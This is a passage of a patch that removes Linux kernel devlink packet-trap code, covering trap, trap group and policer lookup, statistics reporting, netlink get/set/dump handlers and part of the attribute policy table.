+-	struct devlink_trap_policer_item *policer_item;
+-	struct list_head list;
+-	struct devlink_stats __percpu *stats;
+-};
+-
+-/**
+- * struct devlink_trap_item - Packet trap attributes.
+- * @trap: Immutable packet trap attributes.
+- * @group_item: Associated group item.
+- * @list: trap_list member.
+- * @action: Trap action.
+- * @stats: Trap statistics.
+- * @priv: Driver private information.
+- *
+- * Describes both mutable and immutable packet trap attributes. Created by
+- * devlink during trap registration and used for all trap related operations.
+- */
+-struct devlink_trap_item {
+-	const struct devlink_trap *trap;
+-	struct devlink_trap_group_item *group_item;
+-	struct list_head list;
+-	enum devlink_trap_action action;
+-	struct devlink_stats __percpu *stats;
+-	void *priv;
+-};
+-
+-static struct devlink_trap_policer_item *
+-devlink_trap_policer_item_lookup(struct devlink *devlink, u32 id)
+-{
+-	struct devlink_trap_policer_item *policer_item;
+-
+-	list_for_each_entry(policer_item, &devlink->trap_policer_list, list) {
+-		if (policer_item->policer->id == id)
+-			return policer_item;
+-	}
+-
+-	return NULL;
+-}
+-
+-static struct devlink_trap_item *
+-devlink_trap_item_lookup(struct devlink *devlink, const char *name)
+-{
+-	struct devlink_trap_item *trap_item;
+-
+-	list_for_each_entry(trap_item, &devlink->trap_list, list) {
+-		if (!strcmp(trap_item->trap->name, name))
+-			return trap_item;
+-	}
+-
+-	return NULL;
+-}
+-
+-static struct devlink_trap_item *
+-devlink_trap_item_get_from_info(struct devlink *devlink,
+-				struct genl_info *info)
+-{
+-	struct nlattr *attr;
+-
+-	if (!info->attrs[DEVLINK_ATTR_TRAP_NAME])
+-		return NULL;
+-	attr = info->attrs[DEVLINK_ATTR_TRAP_NAME];
+-
+-	return devlink_trap_item_lookup(devlink, nla_data(attr));
+-}
+-
+-static int
+-devlink_trap_action_get_from_info(struct genl_info *info,
+-				  enum devlink_trap_action *p_trap_action)
+-{
+-	u8 val;
+-
+-	val = nla_get_u8(info->attrs[DEVLINK_ATTR_TRAP_ACTION]);
+-	switch (val) {
+-	case DEVLINK_TRAP_ACTION_DROP:
+-	case DEVLINK_TRAP_ACTION_TRAP:
+-	case DEVLINK_TRAP_ACTION_MIRROR:
+-		*p_trap_action = val;
+-		break;
+-	default:
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-static int devlink_trap_metadata_put(struct sk_buff *msg,
+-				     const struct devlink_trap *trap)
+-{
+-	struct nlattr *attr;
+-
+-	attr = nla_nest_start(msg, DEVLINK_ATTR_TRAP_METADATA);
+-	if (!attr)
+-		return -EMSGSIZE;
+-
+-	if ((trap->metadata_cap & DEVLINK_TRAP_METADATA_TYPE_F_IN_PORT) &&
+-	    nla_put_flag(msg, DEVLINK_ATTR_TRAP_METADATA_TYPE_IN_PORT))
+-		goto nla_put_failure;
+-	if ((trap->metadata_cap & DEVLINK_TRAP_METADATA_TYPE_F_FA_COOKIE) &&
+-	    nla_put_flag(msg, DEVLINK_ATTR_TRAP_METADATA_TYPE_FA_COOKIE))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(msg, attr);
+-
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(msg, attr);
+-	return -EMSGSIZE;
+-}
+-
+-static void devlink_trap_stats_read(struct devlink_stats __percpu *trap_stats,
+-				    struct devlink_stats *stats)
+-{
+-	int i;
+-
+-	memset(stats, 0, sizeof(*stats));
+-	for_each_possible_cpu(i) {
+-		struct devlink_stats *cpu_stats;
+-		u64 rx_packets, rx_bytes;
+-		unsigned int start;
+-
+-		cpu_stats = per_cpu_ptr(trap_stats, i);
+-		do {
+-			start = u64_stats_fetch_begin_irq(&cpu_stats->syncp);
+-			rx_packets = u64_stats_read(&cpu_stats->rx_packets);
+-			rx_bytes = u64_stats_read(&cpu_stats->rx_bytes);
+-		} while (u64_stats_fetch_retry_irq(&cpu_stats->syncp, start));
+-
+-		u64_stats_add(&stats->rx_packets, rx_packets);
+-		u64_stats_add(&stats->rx_bytes, rx_bytes);
+-	}
+-}
+-
+-static int
+-devlink_trap_group_stats_put(struct sk_buff *msg,
+-			     struct devlink_stats __percpu *trap_stats)
+-{
+-	struct devlink_stats stats;
+-	struct nlattr *attr;
+-
+-	devlink_trap_stats_read(trap_stats, &stats);
+-
+-	attr = nla_nest_start(msg, DEVLINK_ATTR_STATS);
+-	if (!attr)
+-		return -EMSGSIZE;
+-
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_PACKETS,
+-			      u64_stats_read(&stats.rx_packets),
+-			      DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_BYTES,
+-			      u64_stats_read(&stats.rx_bytes),
+-			      DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(msg, attr);
+-
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(msg, attr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_trap_stats_put(struct sk_buff *msg, struct devlink *devlink,
+-				  const struct devlink_trap_item *trap_item)
+-{
+-	struct devlink_stats stats;
+-	struct nlattr *attr;
+-	u64 drops = 0;
+-	int err;
+-
+-	if (devlink->ops->trap_drop_counter_get) {
+-		err = devlink->ops->trap_drop_counter_get(devlink,
+-							  trap_item->trap,
+-							  &drops);
+-		if (err)
+-			return err;
+-	}
+-
+-	devlink_trap_stats_read(trap_item->stats, &stats);
+-
+-	attr = nla_nest_start(msg, DEVLINK_ATTR_STATS);
+-	if (!attr)
+-		return -EMSGSIZE;
+-
+-	if (devlink->ops->trap_drop_counter_get &&
+-	    nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_DROPPED, drops,
+-			      DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_PACKETS,
+-			      u64_stats_read(&stats.rx_packets),
+-			      DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_BYTES,
+-			      u64_stats_read(&stats.rx_bytes),
+-			      DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(msg, attr);
+-
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(msg, attr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_trap_fill(struct sk_buff *msg, struct devlink *devlink,
+-				const struct devlink_trap_item *trap_item,
+-				enum devlink_command cmd, u32 portid, u32 seq,
+-				int flags)
+-{
+-	struct devlink_trap_group_item *group_item = trap_item->group_item;
+-	void *hdr;
+-	int err;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-
+-	if (nla_put_string(msg, DEVLINK_ATTR_TRAP_GROUP_NAME,
+-			   group_item->group->name))
+-		goto nla_put_failure;
+-
+-	if (nla_put_string(msg, DEVLINK_ATTR_TRAP_NAME, trap_item->trap->name))
+-		goto nla_put_failure;
+-
+-	if (nla_put_u8(msg, DEVLINK_ATTR_TRAP_TYPE, trap_item->trap->type))
+-		goto nla_put_failure;
+-
+-	if (trap_item->trap->generic &&
+-	    nla_put_flag(msg, DEVLINK_ATTR_TRAP_GENERIC))
+-		goto nla_put_failure;
+-
+-	if (nla_put_u8(msg, DEVLINK_ATTR_TRAP_ACTION, trap_item->action))
+-		goto nla_put_failure;
+-
+-	err = devlink_trap_metadata_put(msg, trap_item->trap);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	err = devlink_trap_stats_put(msg, devlink, trap_item);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	genlmsg_end(msg, hdr);
+-
+-	return 0;
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_cmd_trap_get_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct netlink_ext_ack *extack = info->extack;
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_trap_item *trap_item;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	if (list_empty(&devlink->trap_list))
+-		return -EOPNOTSUPP;
+-
+-	trap_item = devlink_trap_item_get_from_info(devlink, info);
+-	if (!trap_item) {
+-		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap");
+-		return -ENOENT;
+-	}
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_trap_fill(msg, devlink, trap_item,
+-				   DEVLINK_CMD_TRAP_NEW, info->snd_portid,
+-				   info->snd_seq, 0);
+-	if (err)
+-		goto err_trap_fill;
+-
+-	return genlmsg_reply(msg, info);
+-
+-err_trap_fill:
+-	nlmsg_free(msg);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_trap_get_dumpit(struct sk_buff *msg,
+-					  struct netlink_callback *cb)
+-{
+-	struct devlink_trap_item *trap_item;
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		devl_lock(devlink);
+-		list_for_each_entry(trap_item, &devlink->trap_list, list) {
+-			if (idx < start) {
+-				idx++;
+-				continue;
+-			}
+-			err = devlink_nl_trap_fill(msg, devlink, trap_item,
+-						   DEVLINK_CMD_TRAP_NEW,
+-						   NETLINK_CB(cb->skb).portid,
+-						   cb->nlh->nlmsg_seq,
+-						   NLM_F_MULTI);
+-			if (err) {
+-				devl_unlock(devlink);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-			idx++;
+-		}
+-		devl_unlock(devlink);
+-		devlink_put(devlink);
+-	}
+-out:
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int __devlink_trap_action_set(struct devlink *devlink,
+-				     struct devlink_trap_item *trap_item,
+-				     enum devlink_trap_action trap_action,
+-				     struct netlink_ext_ack *extack)
+-{
+-	int err;
+-
+-	if (trap_item->action != trap_action &&
+-	    trap_item->trap->type != DEVLINK_TRAP_TYPE_DROP) {
+-		NL_SET_ERR_MSG_MOD(extack, "Cannot change action of non-drop traps. Skipping");
+-		return 0;
+-	}
+-
+-	err = devlink->ops->trap_action_set(devlink, trap_item->trap,
+-					    trap_action, extack);
+-	if (err)
+-		return err;
+-
+-	trap_item->action = trap_action;
+-
+-	return 0;
+-}
+-
+-static int devlink_trap_action_set(struct devlink *devlink,
+-				   struct devlink_trap_item *trap_item,
+-				   struct genl_info *info)
+-{
+-	enum devlink_trap_action trap_action;
+-	int err;
+-
+-	if (!info->attrs[DEVLINK_ATTR_TRAP_ACTION])
+-		return 0;
+-
+-	err = devlink_trap_action_get_from_info(info, &trap_action);
+-	if (err) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "Invalid trap action");
+-		return -EINVAL;
+-	}
+-
+-	return __devlink_trap_action_set(devlink, trap_item, trap_action,
+-					 info->extack);
+-}
+-
+-static int devlink_nl_cmd_trap_set_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct netlink_ext_ack *extack = info->extack;
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_trap_item *trap_item;
+-
+-	if (list_empty(&devlink->trap_list))
+-		return -EOPNOTSUPP;
+-
+-	trap_item = devlink_trap_item_get_from_info(devlink, info);
+-	if (!trap_item) {
+-		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap");
+-		return -ENOENT;
+-	}
+-
+-	return devlink_trap_action_set(devlink, trap_item, info);
+-}
+-
+-static struct devlink_trap_group_item *
+-devlink_trap_group_item_lookup(struct devlink *devlink, const char *name)
+-{
+-	struct devlink_trap_group_item *group_item;
+-
+-	list_for_each_entry(group_item, &devlink->trap_group_list, list) {
+-		if (!strcmp(group_item->group->name, name))
+-			return group_item;
+-	}
+-
+-	return NULL;
+-}
+-
+-static struct devlink_trap_group_item *
+-devlink_trap_group_item_lookup_by_id(struct devlink *devlink, u16 id)
+-{
+-	struct devlink_trap_group_item *group_item;
+-
+-	list_for_each_entry(group_item, &devlink->trap_group_list, list) {
+-		if (group_item->group->id == id)
+-			return group_item;
+-	}
+-
+-	return NULL;
+-}
+-
+-static struct devlink_trap_group_item *
+-devlink_trap_group_item_get_from_info(struct devlink *devlink,
+-				      struct genl_info *info)
+-{
+-	char *name;
+-
+-	if (!info->attrs[DEVLINK_ATTR_TRAP_GROUP_NAME])
+-		return NULL;
+-	name = nla_data(info->attrs[DEVLINK_ATTR_TRAP_GROUP_NAME]);
+-
+-	return devlink_trap_group_item_lookup(devlink, name);
+-}
+-
+-static int
+-devlink_nl_trap_group_fill(struct sk_buff *msg, struct devlink *devlink,
+-			   const struct devlink_trap_group_item *group_item,
+-			   enum devlink_command cmd, u32 portid, u32 seq,
+-			   int flags)
+-{
+-	void *hdr;
+-	int err;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-
+-	if (nla_put_string(msg, DEVLINK_ATTR_TRAP_GROUP_NAME,
+-			   group_item->group->name))
+-		goto nla_put_failure;
+-
+-	if (group_item->group->generic &&
+-	    nla_put_flag(msg, DEVLINK_ATTR_TRAP_GENERIC))
+-		goto nla_put_failure;
+-
+-	if (group_item->policer_item &&
+-	    nla_put_u32(msg, DEVLINK_ATTR_TRAP_POLICER_ID,
+-			group_item->policer_item->policer->id))
+-		goto nla_put_failure;
+-
+-	err = devlink_trap_group_stats_put(msg, group_item->stats);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	genlmsg_end(msg, hdr);
+-
+-	return 0;
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_cmd_trap_group_get_doit(struct sk_buff *skb,
+-					      struct genl_info *info)
+-{
+-	struct netlink_ext_ack *extack = info->extack;
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_trap_group_item *group_item;
+-	struct sk_buff *msg;
+-	int err;
+-
+-	if (list_empty(&devlink->trap_group_list))
+-		return -EOPNOTSUPP;
+-
+-	group_item = devlink_trap_group_item_get_from_info(devlink, info);
+-	if (!group_item) {
+-		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap group");
+-		return -ENOENT;
+-	}
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_trap_group_fill(msg, devlink, group_item,
+-					 DEVLINK_CMD_TRAP_GROUP_NEW,
+-					 info->snd_portid, info->snd_seq, 0);
+-	if (err)
+-		goto err_trap_group_fill;
+-
+-	return genlmsg_reply(msg, info);
+-
+-err_trap_group_fill:
+-	nlmsg_free(msg);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_trap_group_get_dumpit(struct sk_buff *msg,
+-						struct netlink_callback *cb)
+-{
+-	enum devlink_command cmd = DEVLINK_CMD_TRAP_GROUP_NEW;
+-	struct devlink_trap_group_item *group_item;
+-	u32 portid = NETLINK_CB(cb->skb).portid;
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		devl_lock(devlink);
+-		list_for_each_entry(group_item, &devlink->trap_group_list,
+-				    list) {
+-			if (idx < start) {
+-				idx++;
+-				continue;
+-			}
+-			err = devlink_nl_trap_group_fill(msg, devlink,
+-							 group_item, cmd,
+-							 portid,
+-							 cb->nlh->nlmsg_seq,
+-							 NLM_F_MULTI);
+-			if (err) {
+-				devl_unlock(devlink);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-			idx++;
+-		}
+-		devl_unlock(devlink);
+-		devlink_put(devlink);
+-	}
+-out:
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int
+-__devlink_trap_group_action_set(struct devlink *devlink,
+-				struct devlink_trap_group_item *group_item,
+-				enum devlink_trap_action trap_action,
+-				struct netlink_ext_ack *extack)
+-{
+-	const char *group_name = group_item->group->name;
+-	struct devlink_trap_item *trap_item;
+-	int err;
+-
+-	if (devlink->ops->trap_group_action_set) {
+-		err = devlink->ops->trap_group_action_set(devlink, group_item->group,
+-							  trap_action, extack);
+-		if (err)
+-			return err;
+-
+-		list_for_each_entry(trap_item, &devlink->trap_list, list) {
+-			if (strcmp(trap_item->group_item->group->name, group_name))
+-				continue;
+-			if (trap_item->action != trap_action &&
+-			    trap_item->trap->type != DEVLINK_TRAP_TYPE_DROP)
+-				continue;
+-			trap_item->action = trap_action;
+-		}
+-
+-		return 0;
+-	}
+-
+-	list_for_each_entry(trap_item, &devlink->trap_list, list) {
+-		if (strcmp(trap_item->group_item->group->name, group_name))
+-			continue;
+-		err = __devlink_trap_action_set(devlink, trap_item,
+-						trap_action, extack);
+-		if (err)
+-			return err;
+-	}
+-
+-	return 0;
+-}
+-
+-static int
+-devlink_trap_group_action_set(struct devlink *devlink,
+-			      struct devlink_trap_group_item *group_item,
+-			      struct genl_info *info, bool *p_modified)
+-{
+-	enum devlink_trap_action trap_action;
+-	int err;
+-
+-	if (!info->attrs[DEVLINK_ATTR_TRAP_ACTION])
+-		return 0;
+-
+-	err = devlink_trap_action_get_from_info(info, &trap_action);
+-	if (err) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "Invalid trap action");
+-		return -EINVAL;
+-	}
+-
+-	err = __devlink_trap_group_action_set(devlink, group_item, trap_action,
+-					      info->extack);
+-	if (err)
+-		return err;
+-
+-	*p_modified = true;
+-
+-	return 0;
+-}
+-
+-static int devlink_trap_group_set(struct devlink *devlink,
+-				  struct devlink_trap_group_item *group_item,
+-				  struct genl_info *info)
+-{
+-	struct devlink_trap_policer_item *policer_item;
+-	struct netlink_ext_ack *extack = info->extack;
+-	const struct devlink_trap_policer *policer;
+-	struct nlattr **attrs = info->attrs;
+-	int err;
+-
+-	if (!attrs[DEVLINK_ATTR_TRAP_POLICER_ID])
+-		return 0;
+-
+-	if (!devlink->ops->trap_group_set)
+-		return -EOPNOTSUPP;
+-
+-	policer_item = group_item->policer_item;
+-	if (attrs[DEVLINK_ATTR_TRAP_POLICER_ID]) {
+-		u32 policer_id;
+-
+-		policer_id = nla_get_u32(attrs[DEVLINK_ATTR_TRAP_POLICER_ID]);
+-		policer_item = devlink_trap_policer_item_lookup(devlink,
+-								policer_id);
+-		if (policer_id && !policer_item) {
+-			NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap policer");
+-			return -ENOENT;
+-		}
+-	}
+-	policer = policer_item ? policer_item->policer : NULL;
+-
+-	err = devlink->ops->trap_group_set(devlink, group_item->group, policer,
+-					   extack);
+-	if (err)
+-		return err;
+-
+-	group_item->policer_item = policer_item;
+-
+-	return 0;
+-}
+-
+-static int devlink_nl_cmd_trap_group_set_doit(struct sk_buff *skb,
+-					      struct genl_info *info)
+-{
+-	struct netlink_ext_ack *extack = info->extack;
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_trap_group_item *group_item;
+-	bool modified = false;
+-	int err;
+-
+-	if (list_empty(&devlink->trap_group_list))
+-		return -EOPNOTSUPP;
+-
+-	group_item = devlink_trap_group_item_get_from_info(devlink, info);
+-	if (!group_item) {
+-		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap group");
+-		return -ENOENT;
+-	}
+-
+-	err = devlink_trap_group_action_set(devlink, group_item, info,
+-					    &modified);
+-	if (err)
+-		return err;
+-
+-	err = devlink_trap_group_set(devlink, group_item, info);
+-	if (err)
+-		goto err_trap_group_set;
+-
+-	return 0;
+-
+-err_trap_group_set:
+-	if (modified)
+-		NL_SET_ERR_MSG_MOD(extack, "Trap group set failed, but some changes were committed already");
+-	return err;
+-}
+-
+-static struct devlink_trap_policer_item *
+-devlink_trap_policer_item_get_from_info(struct devlink *devlink,
+-					struct genl_info *info)
+-{
+-	u32 id;
+-
+-	if (!info->attrs[DEVLINK_ATTR_TRAP_POLICER_ID])
+-		return NULL;
+-	id = nla_get_u32(info->attrs[DEVLINK_ATTR_TRAP_POLICER_ID]);
+-
+-	return devlink_trap_policer_item_lookup(devlink, id);
+-}
+-
+-static int
+-devlink_trap_policer_stats_put(struct sk_buff *msg, struct devlink *devlink,
+-			       const struct devlink_trap_policer *policer)
+-{
+-	struct nlattr *attr;
+-	u64 drops;
+-	int err;
+-
+-	if (!devlink->ops->trap_policer_counter_get)
+-		return 0;
+-
+-	err = devlink->ops->trap_policer_counter_get(devlink, policer, &drops);
+-	if (err)
+-		return err;
+-
+-	attr = nla_nest_start(msg, DEVLINK_ATTR_STATS);
+-	if (!attr)
+-		return -EMSGSIZE;
+-
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_STATS_RX_DROPPED, drops,
+-			      DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(msg, attr);
+-
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(msg, attr);
+-	return -EMSGSIZE;
+-}
+-
+-static int
+-devlink_nl_trap_policer_fill(struct sk_buff *msg, struct devlink *devlink,
+-			     const struct devlink_trap_policer_item *policer_item,
+-			     enum devlink_command cmd, u32 portid, u32 seq,
+-			     int flags)
+-{
+-	void *hdr;
+-	int err;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto nla_put_failure;
+-
+-	if (nla_put_u32(msg, DEVLINK_ATTR_TRAP_POLICER_ID,
+-			policer_item->policer->id))
+-		goto nla_put_failure;
+-
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_TRAP_POLICER_RATE,
+-			      policer_item->rate, DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-	if (nla_put_u64_64bit(msg, DEVLINK_ATTR_TRAP_POLICER_BURST,
+-			      policer_item->burst, DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-
+-	err = devlink_trap_policer_stats_put(msg, devlink,
+-					     policer_item->policer);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	genlmsg_end(msg, hdr);
+-
+-	return 0;
+-
+-nla_put_failure:
+-	genlmsg_cancel(msg, hdr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_nl_cmd_trap_policer_get_doit(struct sk_buff *skb,
+-						struct genl_info *info)
+-{
+-	struct devlink_trap_policer_item *policer_item;
+-	struct netlink_ext_ack *extack = info->extack;
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct sk_buff *msg;
+-	int err;
+-
+-	if (list_empty(&devlink->trap_policer_list))
+-		return -EOPNOTSUPP;
+-
+-	policer_item = devlink_trap_policer_item_get_from_info(devlink, info);
+-	if (!policer_item) {
+-		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap policer");
+-		return -ENOENT;
+-	}
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_trap_policer_fill(msg, devlink, policer_item,
+-					   DEVLINK_CMD_TRAP_POLICER_NEW,
+-					   info->snd_portid, info->snd_seq, 0);
+-	if (err)
+-		goto err_trap_policer_fill;
+-
+-	return genlmsg_reply(msg, info);
+-
+-err_trap_policer_fill:
+-	nlmsg_free(msg);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_trap_policer_get_dumpit(struct sk_buff *msg,
+-						  struct netlink_callback *cb)
+-{
+-	enum devlink_command cmd = DEVLINK_CMD_TRAP_POLICER_NEW;
+-	struct devlink_trap_policer_item *policer_item;
+-	u32 portid = NETLINK_CB(cb->skb).portid;
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		devl_lock(devlink);
+-		list_for_each_entry(policer_item, &devlink->trap_policer_list,
+-				    list) {
+-			if (idx < start) {
+-				idx++;
+-				continue;
+-			}
+-			err = devlink_nl_trap_policer_fill(msg, devlink,
+-							   policer_item, cmd,
+-							   portid,
+-							   cb->nlh->nlmsg_seq,
+-							   NLM_F_MULTI);
+-			if (err) {
+-				devl_unlock(devlink);
+-				devlink_put(devlink);
+-				goto out;
+-			}
+-			idx++;
+-		}
+-		devl_unlock(devlink);
+-		devlink_put(devlink);
+-	}
+-out:
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-static int
+-devlink_trap_policer_set(struct devlink *devlink,
+-			 struct devlink_trap_policer_item *policer_item,
+-			 struct genl_info *info)
+-{
+-	struct netlink_ext_ack *extack = info->extack;
+-	struct nlattr **attrs = info->attrs;
+-	u64 rate, burst;
+-	int err;
+-
+-	rate = policer_item->rate;
+-	burst = policer_item->burst;
+-
+-	if (attrs[DEVLINK_ATTR_TRAP_POLICER_RATE])
+-		rate = nla_get_u64(attrs[DEVLINK_ATTR_TRAP_POLICER_RATE]);
+-
+-	if (attrs[DEVLINK_ATTR_TRAP_POLICER_BURST])
+-		burst = nla_get_u64(attrs[DEVLINK_ATTR_TRAP_POLICER_BURST]);
+-
+-	if (rate < policer_item->policer->min_rate) {
+-		NL_SET_ERR_MSG_MOD(extack, "Policer rate lower than limit");
+-		return -EINVAL;
+-	}
+-
+-	if (rate > policer_item->policer->max_rate) {
+-		NL_SET_ERR_MSG_MOD(extack, "Policer rate higher than limit");
+-		return -EINVAL;
+-	}
+-
+-	if (burst < policer_item->policer->min_burst) {
+-		NL_SET_ERR_MSG_MOD(extack, "Policer burst size lower than limit");
+-		return -EINVAL;
+-	}
+-
+-	if (burst > policer_item->policer->max_burst) {
+-		NL_SET_ERR_MSG_MOD(extack, "Policer burst size higher than limit");
+-		return -EINVAL;
+-	}
+-
+-	err = devlink->ops->trap_policer_set(devlink, policer_item->policer,
+-					     rate, burst, info->extack);
+-	if (err)
+-		return err;
+-
+-	policer_item->rate = rate;
+-	policer_item->burst = burst;
+-
+-	return 0;
+-}
+-
+-static int devlink_nl_cmd_trap_policer_set_doit(struct sk_buff *skb,
+-						struct genl_info *info)
+-{
+-	struct devlink_trap_policer_item *policer_item;
+-	struct netlink_ext_ack *extack = info->extack;
+-	struct devlink *devlink = info->user_ptr[0];
+-
+-	if (list_empty(&devlink->trap_policer_list))
+-		return -EOPNOTSUPP;
+-
+-	if (!devlink->ops->trap_policer_set)
+-		return -EOPNOTSUPP;
+-
+-	policer_item = devlink_trap_policer_item_get_from_info(devlink, info);
+-	if (!policer_item) {
+-		NL_SET_ERR_MSG_MOD(extack, "Device did not register this trap policer");
+-		return -ENOENT;
+-	}
+-
+-	return devlink_trap_policer_set(devlink, policer_item, info);
+-}
+-
+-static const struct nla_policy devlink_nl_policy[DEVLINK_ATTR_MAX + 1] = {
+-	[DEVLINK_ATTR_UNSPEC] = { .strict_start_type =
+-		DEVLINK_ATTR_TRAP_POLICER_ID },
+-	[DEVLINK_ATTR_BUS_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_DEV_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_PORT_INDEX] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_PORT_TYPE] = NLA_POLICY_RANGE(NLA_U16, DEVLINK_PORT_TYPE_AUTO,
+-						    DEVLINK_PORT_TYPE_IB),
+-	[DEVLINK_ATTR_PORT_SPLIT_COUNT] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_SB_INDEX] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_SB_POOL_INDEX] = { .type = NLA_U16 },
+-	[DEVLINK_ATTR_SB_POOL_TYPE] = { .type = NLA_U8 },
+-	[DEVLINK_ATTR_SB_POOL_SIZE] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_SB_POOL_THRESHOLD_TYPE] = { .type = NLA_U8 },
+-	[DEVLINK_ATTR_SB_THRESHOLD] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_SB_TC_INDEX] = { .type = NLA_U16 },
+-	[DEVLINK_ATTR_ESWITCH_MODE] = NLA_POLICY_RANGE(NLA_U16, DEVLINK_ESWITCH_MODE_LEGACY,
+-						       DEVLINK_ESWITCH_MODE_SWITCHDEV),
+-	[DEVLINK_ATTR_ESWITCH_INLINE_MODE] = { .type = NLA_U8 },
+-	[DEVLINK_ATTR_ESWITCH_ENCAP_MODE] = { .type = NLA_U8 },
+-	[DEVLINK_ATTR_DPIPE_TABLE_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_DPIPE_TABLE_COUNTERS_ENABLED] = { .type = NLA_U8 },
+-	[DEVLINK_ATTR_RESOURCE_ID] = { .type = NLA_U64},
+-	[DEVLINK_ATTR_RESOURCE_SIZE] = { .type = NLA_U64},
+-	[DEVLINK_ATTR_PARAM_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_PARAM_TYPE] = { .type = NLA_U8 },
+-	[DEVLINK_ATTR_PARAM_VALUE_CMODE] = { .type = NLA_U8 },
+-	[DEVLINK_ATTR_REGION_NAME] = { .type = NLA_NUL_STRING },
+-	[DEVLINK_ATTR_REGION_SNAPSHOT_ID] = { .type = NLA_U32 },
+-	[DEVLINK_ATTR_REGION_CHUNK_ADDR] = { .type = NLA_U64 },
